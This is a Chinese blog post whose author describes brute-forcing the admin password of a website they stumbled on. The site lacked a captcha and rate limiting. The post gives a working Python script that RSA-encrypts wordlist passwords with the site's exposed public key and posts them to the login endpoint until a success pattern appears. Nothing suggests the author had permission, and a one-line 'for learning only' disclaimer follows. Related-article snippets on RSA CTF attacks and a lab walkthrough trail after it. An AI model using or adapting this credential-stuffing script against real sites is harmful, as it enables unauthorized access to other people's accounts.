python RSA加密 爆破密码

最新推荐文章于 2024-05-20 20:26:39 发布
最新推荐文章于 2024-05-20 20:26:39 发布
阅读量1.4k 收藏
点赞数
文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47356348/article/details/127007671
版权

python RSA加密 爆破密码

背景

闲来无事,发现某网站,存在admin账户,无验证码,无登录次数限制。于是想到暴力破解密码试试,但抓包发现密码经过RSA加密,且公钥在前端源码中已经暴露出来。因此写下以下代码来爆破密码。

代码

from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
import base64
import requests
import re
import time


def RSA_pwd(passwd, publickey):
    passwd=passwd.encode('utf-8')
    recipient_key = RSA.import_key(open(publickey).read())
    cipher_rsa = PKCS1_OAEP.new(recipient_key)
    c = cipher_rsa.encrypt(passwd)
    d = base64.b64encode(c).decode()
    return d

def request_url(passwd):
    url = 'http://XXXXXXXXXXXX'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'cookie': 'EPXXXXXXALE=zh_CN; JSESSIONID=5XXXXXXXXXXXXXX366E4A'

    }
    data = {
        'ACCOUNT': 'admin',
        'PASSWORD': f'{passwd}',
        'FM_SYS_ID': 'XXXXXXX',
        'FIVXXXE_LOCK' : '',
        'serviceUrl' : 'null'
    }

    re = requests.post(url=url,headers=headers,data=data)
    print(re.status_code)
    return re.text

pattern = "\":su"

#打开字典
with open('pass_kill.txt') as f:
    for i in f:
        i=i[:-1]
        passwd = RSA_pwd(i,'publickey.bin')
        cc = request_url(passwd)
        print(cc)
        if re.search(pattern, cc, re.I):
            print(i)
            exit()
        # time.sleep(3)

免责声明

本文仅供学习,请勿拿来从事非法活动。一切非法活动皆与本人无关。

Day_0713
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
关联爆破-RSA分解
weixin_52640415的博客
04-27 1843
RSA 爆破p,q
基于PKCS1_OAEP的RSA加解密
qtL0ng的博客
04-06 1770
基于PKCS1_OAEP的RSA加解密 # -*- coding: UTF-8 -*- from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_OAEP import libnum import base64 ''' #注释部分为加密过程 m = "flag{I_Really_Love_You_Very_much_Forver_every!}" pub = open('pubkey.pem').read() key = RSA.imp
RSA攻击
Q221022的博客
03-26 2530
目录 RSA RSA的解密 RSA密钥对的生成 对RSA的攻击 暴力破解求D Mallory中间人攻击 维纳攻击(Wiener’s Attack) 低指数攻击 低加密指数广播攻击 共模攻击 RSARSA中,明文、密钥和密文都是数字。加密过程可以用下列公式来表示 密文=明文 ^ E mod N 也就是说,RSA的密文是对代表明文的数字的E次方求mod N的结果。换句话说,就是将明文和自己做E次乘法,然后将其结果除以N求余数,这个余数就是密文。 加密公式中的E和N,
Bugku Crypto 给你私钥吧 wp
shifaziran2007的博客
09-09 2062
rsaencypt.py: from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_OAEP import base64 from flag import flag f=open(r"pubkey.pem","r") key=RSA.importKey(f.read()) cipher=PKCS1_OAEP.new(key) cipher_txt=base64.b64encode(cipher.encrypt(flag))
pycrypto-2.6.1-cp37-cp37m-win_amd64.whl
05-10
ISSUE Crypto/PublicKey/RSA.py", line 375, in decrypt raise NotImplementedError("Use module Crypto.Cipher.PKCS1_OAEP instead") NotImplementedError: Use module Crypto.Cipher.PKCS1_OAEP instead SOLUTION pip uninstall pycryptodome pip uninstall pycrypto pip install pycrypto
攻防世界 Crypto进阶 Handicraft_RSA
qtL0ng的博客
06-02 1322
1、题目 #!/usr/bin/python from Crypto.Util.number import * from Crypto.PublicKey import RSA from secret import s, FLAG def gen_prime(s): while True: r = getPrime(s) #生成一个素数r R = [r] #将r转换为列表 t = int(5 * s / 2) + 1 for i i
rsa爆破e(已知c,p,c)
m0_74030040的博客
11-03 490
rsa爆破e(已知c,p,c)
crypto-RSA-常用解密代码块
m0_57291352的博客
09-09 4087
已知n、e、c,基础解 先分解n,在线分解:http://www.factordb.com/index.php import gmpy2 from Crypto.Util.number import long_to_bytes e = 547223 n = 17083941230213489700426636484487738282426471494607098847295335339638177583685457921198569105417734668692072727759139358207667
Python安全之突破RSA加密进行暴力破解
weixin_43853965的博客
02-01 2427
背景: 在对某网站进行安全测试的时候,发现登录密码加密的,而且同一密码每登录一次生成的密文都不相同,用Burp对登录接口进行重放,发现并没有什么限制,由此初步推断是可以进行暴力破解的。但是由于密码加密的,使用Burp的暴力破解模块无能为力,于是自己用Pyhon编写了个暴力破解的脚本。 分析: 在用Burp对登录接口进行重放时,删除了一些参数,都未对响应结果产生影响。由此推断,要暴力破解,只需搞...
python rsa 加密解密
09-21
本篇文章主要介绍了python rsa加密解密 (编解码,base64编解码)的相关知识。具有很好的参考价值,下面跟着小编一起来看下吧
Python实现的rsa加密算法详解
09-20
主要介绍了Python实现的rsa加密算法,结合完整实例形式分析了Python实现rsa加密算法的原理、步骤与相关操作技巧,需要的朋友可以参考下
python实现rsa加密算法
06-01
这个算法非原创,真心不错,所以上传分享出来.实测过,满足需求
python实现rsa加密实例详解
12-23
python实现rsa加密实例详解 一 代码 import rsa key = rsa.newkeys(3000)#生成随机秘钥 privateKey = key[1]#私钥 publicKey = key[0]#公钥 message ='sanxi Now is better than never.' print('Before encrypted:...
RSA加密/解密】PKCS1_OAEP和PKCS1_v1_5两种填充方案【python RSA密钥对生成、密码加密、密文解密、pycharm安装Crypto】
weixin_51910506的博客
08-16 3280
Python RSA密钥对生成、密码加密、密文解密、pycharm安装Crypto
【愚公系列】2022年04月 密码学攻击-RSA之暴力分解N
热门推荐
时光隧道
09-23 4万+
在CTF中分别得到了N和C,请问你能解密他吗 我们的任务分为3个部分: 1.了解什么情况可分解N,可用什么工具来分解N。 2.完成题目 分析N的大小,并对其进行分解 学习了预备知识后我们开始今天的课程 我们知道了Q,P是组成N的因素,Q和P越大,产生的N也越大,那反之,N很小的时候,组成的Q,P也很小,所有我们可以通过暴力分解的方法对其进行分解取得Q,P。以下是例子 首先我们先打开pentestbox,通过ssh生成一个私钥来分析 openssl.exe genrsa -out rsa_private_ke
raise NotImplementedError
weixin_44457930的博客
09-15 123
https://blog.csdn.net/Strive_For_Future/article/details/103587350
密码学】RSA破解方法汇总(PYTHON实现)
Mr_Fmnwon的博客
12-13 2960
源自于密码学的一次大作业~
CTF Crypto---RSA KCS1_OAEP模式
3tefanie丶zhou的博客
07-19 1820
【青青槐荫,皎皎月光。春风一披拂,百卉各争妍】
【hackmyvm】Slowman靶机
最新发布
woshicainiao666的博客
05-20 1394
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密密码
PythonRSA加密解密算法
04-05
PythonRSA是一个用于加密和解密数据的Python库,它基于RSA算法。RSA是一种非对称加密算法,使用公钥加密数据,私钥解密数据。下面是PythonRSA加密解密算法的介绍: 1. 生成密钥对:使用PythonRSA可以生成RSA密钥对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值